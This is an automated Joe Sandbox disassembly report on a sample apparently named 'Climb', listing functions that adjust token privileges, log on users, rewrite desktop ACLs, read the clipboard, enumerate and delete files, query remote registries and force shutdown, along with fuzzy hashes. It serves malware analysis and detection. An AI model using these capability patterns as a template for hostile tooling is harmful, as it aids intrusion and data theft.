Part of subcall function 004E2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004E205A
Part of subcall function 004E2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004E2087
Part of subcall function 004E2010: GetLastError.KERNEL32 ref: 004E2097

LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 004E1BD2
DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 004E1BF4
CloseHandle.KERNEL32(?), ref: 004E1C05
OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 004E1C1D
GetProcessWindowStation.USER32 ref: 004E1C36
SetProcessWindowStation.USER32(00000000), ref: 004E1C40
OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 004E1C5C

Part of subcall function 004E1A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,004E1B48), ref: 004E1A20
Part of subcall function 004E1A0B: CloseHandle.KERNEL32(?,?,004E1B48), ref: 004E1A35

Strings

, xrefs: 004E1BA6
winsta0\default, xrefs: 004E1CDE
winsta0, xrefs: 004E1C18
default, xrefs: 004E1C57

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
String ID: $default$winsta0$winsta0\default
API String ID: 22674027-1685893292
Opcode ID: 09775f2240c948be01dd79a5095e3d5a3b867731dc9c676010b0c48c5939a2a9
Instruction ID: fedd9eb28635ab5b90a62c6477ad2701ba9aec52c312d6eea949bbb23ca8dd6b
Opcode Fuzzy Hash: 09775f2240c948be01dd79a5095e3d5a3b867731dc9c676010b0c48c5939a2a9
Instruction Fuzzy Hash: DA81BF71940288AFDF119FA6CC49FEF7BB8FF04305F14802AF914A62A0D7799945DB64

Function 004E14AE Relevance: 31.7, APIs: 21, Instructions: 202memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 004E1A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 004E1A60
Part of subcall function 004E1A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,004E14E7,?,?,?), ref: 004E1A6C
Part of subcall function 004E1A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,004E14E7,?,?,?), ref: 004E1A7B
Part of subcall function 004E1A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,004E14E7,?,?,?), ref: 004E1A82
Part of subcall function 004E1A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 004E1A99

GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 004E1518
GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 004E154C
GetLengthSid.ADVAPI32(?), ref: 004E1563
GetAce.ADVAPI32(?,00000000,?), ref: 004E159D
AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 004E15B9
GetLengthSid.ADVAPI32(?), ref: 004E15D0
GetProcessHeap.KERNEL32(00000008,00000008), ref: 004E15D8
HeapAlloc.KERNEL32(00000000), ref: 004E15DF
GetLengthSid.ADVAPI32(?,00000008,?), ref: 004E1600
CopySid.ADVAPI32(00000000), ref: 004E1607
AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 004E1636
SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 004E1658
SetUserObjectSecurity.USER32(?,00000004,?), ref: 004E166A
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004E1691
HeapFree.KERNEL32(00000000), ref: 004E1698
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004E16A1
HeapFree.KERNEL32(00000000), ref: 004E16A8
GetProcessHeap.KERNEL32(00000000,00000000), ref: 004E16B1
HeapFree.KERNEL32(00000000), ref: 004E16B8
GetProcessHeap.KERNEL32(00000000,?), ref: 004E16C4
HeapFree.KERNEL32(00000000), ref: 004E16CB

Part of subcall function 004E1ADF: GetProcessHeap.KERNEL32(00000008,004E14FD,?,00000000,?,004E14FD,?), ref: 004E1AED
Part of subcall function 004E1ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,004E14FD,?), ref: 004E1AF4
Part of subcall function 004E1ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,004E14FD,?), ref: 004E1B03

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
String ID:
API String ID: 4175595110-0
Opcode ID: c65f5266cc6c9489b5044d402c936804d756ede70c225da1e8d1006313023168
Instruction ID: 3516b29862c2b382267d56bdd27ee54962c2699b91ec7dd52971d1e00bffa96a
Opcode Fuzzy Hash: c65f5266cc6c9489b5044d402c936804d756ede70c225da1e8d1006313023168
Instruction Fuzzy Hash: 3D715EB2940249BBDF10DFA6DC48FEFBBB8BF14341F088516E915A72A0D7359905CB64

Function 004FF55C Relevance: 30.2, APIs: 20, Instructions: 191clipboardfileCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32(0051DCD0), ref: 004FF586
IsClipboardFormatAvailable.USER32(0000000D), ref: 004FF594
GetClipboardData.USER32(0000000D), ref: 004FF5A0
CloseClipboard.USER32 ref: 004FF5AC
GlobalLock.KERNEL32(00000000), ref: 004FF5E4
CloseClipboard.USER32 ref: 004FF5EE
GlobalUnlock.KERNEL32(00000000), ref: 004FF619
IsClipboardFormatAvailable.USER32(00000001), ref: 004FF626
GetClipboardData.USER32(00000001), ref: 004FF62E
GlobalLock.KERNEL32(00000000), ref: 004FF63F
GlobalUnlock.KERNEL32(00000000), ref: 004FF67F
IsClipboardFormatAvailable.USER32(0000000F), ref: 004FF695
GetClipboardData.USER32(0000000F), ref: 004FF6A1
GlobalLock.KERNEL32(00000000), ref: 004FF6B2
DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 004FF6D4
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 004FF6F1
DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 004FF72F
GlobalUnlock.KERNEL32(00000000), ref: 004FF750
CountClipboardFormats.USER32 ref: 004FF771
CloseClipboard.USER32 ref: 004FF7B6

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
String ID:
API String ID: 420908878-0
Opcode ID: 09e7f35b6bb3825c50da7fc90525609886ec13a1620399c0bc1247cf3e0a7e22
Instruction ID: 5e52cd3fac78bd6067deaf675874aaa6483e122c22b0f5d1efa778380cce6b64
Opcode Fuzzy Hash: 09e7f35b6bb3825c50da7fc90525609886ec13a1620399c0bc1247cf3e0a7e22
Instruction Fuzzy Hash: D461B035204205AFD300EF20D884F7AB7F4EF94708F14846EF656872A2DB79E949DB66

Function 004F73D4 Relevance: 21.4, APIs: 7, Strings: 5, Instructions: 363timefileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 004F7403
FindClose.KERNEL32(00000000), ref: 004F7457
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004F7493
FileTimeToLocalFileTime.KERNEL32(?,?), ref: 004F74BA

Part of subcall function 0048B329: _wcslen.LIBCMT ref: 0048B333

FileTimeToSystemTime.KERNEL32(?,?), ref: 004F74F7
FileTimeToSystemTime.KERNEL32(?,?), ref: 004F7524

Strings

%4d%02d%02d%02d%02d%02d%03d, xrefs: 004F7577
%02d, xrefs: 004F7645, 004F764F, 004F769F, 004F76EF, 004F773F, 004F778F
%4d, xrefs: 004F75F6
%03d, xrefs: 004F77E7
%4d%02d%02d%02d%02d%02d, xrefs: 004F75AF

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
API String ID: 3830820486-3289030164
Opcode ID: 20842d81fe0304994fa07b9a1959f7d8fa7ef2046e2d187562560b18b1d05217
Instruction ID: 31dacb3a20a32119cc8b041e7c52e5655aa8b1663465323102863e4ceb9f2620
Opcode Fuzzy Hash: 20842d81fe0304994fa07b9a1959f7d8fa7ef2046e2d187562560b18b1d05217
Instruction Fuzzy Hash: 77D14071508304AEC714EB65C881EBFB7E8EF88708F444D1EF585D6291EB78D948C7A6

Function 004FA087 Relevance: 21.1, APIs: 11, Strings: 1, Instructions: 118fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 004FA0A8
GetFileAttributesW.KERNEL32(?), ref: 004FA0E6
SetFileAttributesW.KERNEL32(?,?), ref: 004FA100
FindNextFileW.KERNEL32(00000000,?), ref: 004FA118
FindClose.KERNEL32(00000000), ref: 004FA123
FindFirstFileW.KERNEL32(*.*,?), ref: 004FA13F
SetCurrentDirectoryW.KERNEL32(?), ref: 004FA18F
SetCurrentDirectoryW.KERNEL32(00547B94), ref: 004FA1AD
FindNextFileW.KERNEL32(00000000,00000010), ref: 004FA1B7
FindClose.KERNEL32(00000000), ref: 004FA1C4
FindClose.KERNEL32(00000000), ref: 004FA1D4

Strings

*.*, xrefs: 004FA13A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
String ID: *.*
API String ID: 1409584000-438819550
Opcode ID: 8b36c60162e012587facf19ada225cf7b73feb1a52a0c0773a673f3eb7bb0050
Instruction ID: 3694f12946edfe290ce0927f562dc1dccc1cf38fbe6216cf47d11af64db8ff5c
Opcode Fuzzy Hash: 8b36c60162e012587facf19ada225cf7b73feb1a52a0c0773a673f3eb7bb0050
Instruction Fuzzy Hash: 083126B150021D6FDB10AFB0DD09AEF77BCAF05324F004156FA29D2190EB78DE948A6A

Function 004F4763 Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 101fileCOMMON

Download Yara Rule

APIs

GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 004F4785
_wcslen.LIBCMT ref: 004F47B2
CreateDirectoryW.KERNEL32(?,00000000), ref: 004F47E2
CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 004F4803
RemoveDirectoryW.KERNEL32(?), ref: 004F4813
DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 004F489A
CloseHandle.KERNEL32(00000000), ref: 004F48A5
CloseHandle.KERNEL32(00000000), ref: 004F48B0

Strings

\, xrefs: 004F47BC
:, xrefs: 004F47C7
\??\%s, xrefs: 004F47A0

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
String ID: :$\$\??\%s
API String ID: 1149970189-3457252023
Opcode ID: 67700baf1442ac512e1a03a6a1a23c48b360c8346c39c83600ba6bd34b333774
Instruction ID: 8a35bd130d4d185df1839d7731149e78124d4249db6ad423d063d67b264a9824
Opcode Fuzzy Hash: 67700baf1442ac512e1a03a6a1a23c48b360c8346c39c83600ba6bd34b333774
Instruction Fuzzy Hash: 5831A375500149ABDB209FA0DC49FEB37BCEF89744F1081B6F619D2160EB789644DB28

Function 004FA1E2 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 111fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,75918FB0,?,00000000), ref: 004FA203
FindNextFileW.KERNEL32(00000000,?), ref: 004FA25E
FindClose.KERNEL32(00000000), ref: 004FA269
FindFirstFileW.KERNEL32(*.*,?), ref: 004FA285
SetCurrentDirectoryW.KERNEL32(?), ref: 004FA2D5
SetCurrentDirectoryW.KERNEL32(00547B94), ref: 004FA2F3
FindNextFileW.KERNEL32(00000000,00000010), ref: 004FA2FD
FindClose.KERNEL32(00000000), ref: 004FA30A
FindClose.KERNEL32(00000000), ref: 004FA31A

Part of subcall function 004EE399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 004EE3B4

Strings

*.*, xrefs: 004FA280

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
String ID: *.*
API String ID: 2640511053-438819550
Opcode ID: b4b180ac5d7a410885e15d4822555f432cf278bfdc2a0185655e551b5357bcfe
Instruction ID: b60b2813ca0c3878e78cd6a90ca06e5e89c0941ce73850459ed44fa853f0d174
Opcode Fuzzy Hash: b4b180ac5d7a410885e15d4822555f432cf278bfdc2a0185655e551b5357bcfe
Instruction Fuzzy Hash: 79314AB160021D6ECB10AFA5DC09AEF77BCEF05328F114096FA14E3290D779DE95CA69

Function 0050C8A4 Relevance: 17.0, APIs: 11, Instructions: 456registryCOMMON

Download Yara Rule

APIs

Part of subcall function 0050D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0050C10E,?,?), ref: 0050D415
Part of subcall function 0050D3F8: _wcslen.LIBCMT ref: 0050D451
Part of subcall function 0050D3F8: _wcslen.LIBCMT ref: 0050D4C8
Part of subcall function 0050D3F8: _wcslen.LIBCMT ref: 0050D4FE

RegConnectRegistryW.ADVAPI32(?,?,?), ref: 0050C99E
RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 0050CA09
RegCloseKey.ADVAPI32(00000000), ref: 0050CA2D
RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 0050CA8C
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 0050CB47
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0050CBB4
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0050CC49
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 0050CC9A
RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 0050CD43
RegCloseKey.ADVAPI32(?,?,00000000), ref: 0050CDE2
RegCloseKey.ADVAPI32(00000000), ref: 0050CDEF

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
String ID:
API String ID: 3102970594-0
Opcode ID: 36fe3258397ee4e934dba879f73d089c901c50c9a137c15dd4d44f467de4c3ec
Instruction ID: 5ba595e4d667494df16f9e8e49376b334dc593b143f6d9d2f6291ee7a5d63e63
Opcode Fuzzy Hash: 36fe3258397ee4e934dba879f73d089c901c50c9a137c15dd4d44f467de4c3ec
Instruction Fuzzy Hash: C4022C71604240AFD714DF24C895E2ABFE5FF49318F18899DE849CB2A2DB31ED46CB91

Function 004ED921 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 172fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00485851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,004855D1,?,?,004C4B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00485871

Part of subcall function 004EEAB0: GetFileAttributesW.KERNEL32(?,004ED840), ref: 004EEAB1

FindFirstFileW.KERNEL32(?,?), ref: 004ED9CD
DeleteFileW.KERNEL32(?,?,?,?,?,00000000,?,?,?), ref: 004EDA88
MoveFileW.KERNEL32(?,?), ref: 004EDA9B
DeleteFileW.KERNEL32(?,?,?,?), ref: 004EDAB8
FindNextFileW.KERNEL32(00000000,00000010), ref: 004EDAE2

Part of subcall function 004EDB47: CopyFileExW.KERNEL32(?,?,00000000,00000000,00000000,00000008,?,?,004EDAC7,?,?), ref: 004EDB5D

FindClose.KERNEL32(00000000,?,?,?), ref: 004EDAFE
FindClose.KERNEL32(00000000), ref: 004EDB0F

Strings

\*.*, xrefs: 004ED978, 004ED981, 004ED996

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: File$Find$CloseDelete$AttributesCopyFirstFullMoveNameNextPath
String ID: \*.*
API String ID: 1946585618-1173974218
Opcode ID: 4e5a02c4b8318b08c73caddb54ac5bbdf8da36857a27c04f2c56c20ac38349a6
Instruction ID: 6dd56bf50aacef1c0f463cc595eba021d50e09d009af804f81c3f831fdba31fd
Opcode Fuzzy Hash: 4e5a02c4b8318b08c73caddb54ac5bbdf8da36857a27c04f2c56c20ac38349a6
Instruction Fuzzy Hash: C0615431C0114DAFCF05FBA2D9529EDB7B5AF14309F2044AAE401B7152EB396F09CBA9

Function 004FF7C7 Relevance: 13.6, APIs: 9, Instructions: 102clipboardmemoryCOMMON

Download Yara Rule

APIs

OpenClipboard.USER32 ref: 004FF7EE
EmptyClipboard.USER32 ref: 004FF7F4
GlobalAlloc.KERNEL32(00000002,?), ref: 004FF809
CloseClipboard.USER32 ref: 004FF900

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Clipboard$AllocCloseEmptyGlobalOpen
String ID:
API String ID: 1737998785-0
Opcode ID: 16b315697cba024f4c3709b5d6fe2957651ad5a52891aefe36c7c27fbd1d0181
Instruction ID: 127d6dffdee6150a11e115192947057d8e013f4be6f7cce8ac5b0f1134abf039
Opcode Fuzzy Hash: 16b315697cba024f4c3709b5d6fe2957651ad5a52891aefe36c7c27fbd1d0181
Instruction Fuzzy Hash: 4A41D034600611AFD310DF15D488F6A7BE0FF54358F14C4AAE8298B762C739EC46CB94

Function 004EF20D Relevance: 12.3, APIs: 3, Strings: 4, Instructions: 57shutdownCOMMON

Download Yara Rule

APIs

Part of subcall function 004E2010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 004E205A
Part of subcall function 004E2010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 004E2087
Part of subcall function 004E2010: GetLastError.KERNEL32 ref: 004E2097

ExitWindowsEx.USER32(?,00000000), ref: 004EF249

Strings

SeShutdownPrivilege, xrefs: 004EF219
@, xrefs: 004EF23C
, xrefs: 004EF237
, xrefs: 004EF273

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
String ID: $ $@$SeShutdownPrivilege
API String ID: 2234035333-3163812486
Opcode ID: 9557a57d0e9663f3309c0a8e62bba77c15ab1b9b410b41d55753ed35ba733005
Instruction ID: 376d52f93d536b5daaf5a1753c63f9132935b85706b7aefbe75c64338459024e
Opcode Fuzzy Hash: 9557a57d0e9663f3309c0a8e62bba77c15ab1b9b410b41d55753ed35ba733005
Instruction Fuzzy Hash: EF019E3A6102902BEB1423BA5C89FFF336C9F08346F004573FE02E21D1D7694C08A1A8

Function 004822AD Relevance: 10.8, APIs: 5, Strings: 1, Instructions: 308COMMON

Download Yara Rule

APIs

DefDlgProcW.USER32(?,?), ref: 0048233E
GetSysColor.USER32(0000000F), ref: 00482421
SetBkColor.GDI32(?,00000000), ref: 00482434

Strings

(U, xrefs: 0048240A

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Color$Proc
String ID: (U
API String ID: 929743424-2725093197
Opcode ID: 85f4202be68b543e411fd671056d6da06d1f985aa19723725bdb88b669e3ca62
Instruction ID: 1ff8bc0e755c8846337fa5bc5dff6dbdc423d0d86ecb3f5d74697f484e67f5cf
Opcode Fuzzy Hash: 85f4202be68b543e411fd671056d6da06d1f985aa19723725bdb88b669e3ca62
Instruction Fuzzy Hash: 858107F4105400BAE2697A394EACEBF295EEB82301F15890FF902D5695C99D8E43937F

Function 004F3A0E Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 60COMMON

Download Yara Rule

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,004C56C2,?,?,00000000,00000000), ref: 004F3A1E
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,004C56C2,?,?,00000000,00000000), ref: 004F3A35
LoadResource.KERNEL32(?,00000000,?,?,004C56C2,?,?,00000000,00000000,?,?,?,?,?,?,004866CE), ref: 004F3A45
SizeofResource.KERNEL32(?,00000000,?,?,004C56C2,?,?,00000000,00000000,?,?,?,?,?,?,004866CE), ref: 004F3A56
LockResource.KERNEL32(004C56C2,?,?,004C56C2,?,?,00000000,00000000,?,?,?,?,?,?,004866CE,?), ref: 004F3A65

Strings

SCRIPT, xrefs: 004F3A2B

Memory Dump Source

Source File: 0000000E.00000002.2524387379.0000000000481000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00480000, based on PE: true

Associated: 0000000E.00000002.2524366691.0000000000480000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.000000000051D000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524470578.0000000000543000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524523247.000000000054D000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 0000000E.00000002.2524540903.0000000000555000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_480000_Climb.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT
API String ID: 3051347437-3967369404
Opcode ID: 5da3337a99b107f6937fea6d52349e7a9713506e06b099386bcc124e5d37e112
Instruction ID: 9de240627aadf9c81b5350e4c0d1974e64a89308412aaace705bfff4a2d8cac7
